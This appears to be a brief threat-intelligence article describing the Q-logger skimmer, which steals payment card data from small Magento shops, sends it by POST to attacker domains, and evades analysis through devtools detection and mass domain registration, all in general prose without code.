With the explosive growth of the e-commerce sector, the cybercriminals performing Magecart and skimmer attacks have begun diversifying the scope of their threatening operations, the involved methods and the deployed infrastructure. One threat that exemplifies this trend is the recently discovered Q-logger Skimmer. The threat was first detected by Eric Brandel.
Q-logger has been used in active attack campaigns for several months before infosec researchers caught the hackers' activities. The attackers aim to inject the threat either to the compromised e-commerce websites directly or loaded externally. Afterward, they can start siphoning the payment data of the infected site's users and obtaining credit and debit card details. The collected information is exfiltrated to a domain under the hackers' control via POST requests. The Q-logger attacks target smaller businesses that operate an online shop using Magento mainly.
Apart from the typical threatening activities associated with skimmer threats, Q-logger displays several peculiar traits. The threat is equipped with multiple anti-analysis techniques. Beyond obfuscating the code, the hackers have added a keylogger routine capable of detecting when various devtools have been opened. If the checks return a positive result for such devtools being started, Q-logger will terminate its activities completely. Another technique observed to be used by the cybercriminals responsible for the Q-logger attacks is registering domains en masse, which is an effective strategy against blocklists. On the other hand, it tries to compartmentalize the infrastructure of the operations to hide the real IP address of the hosting provider.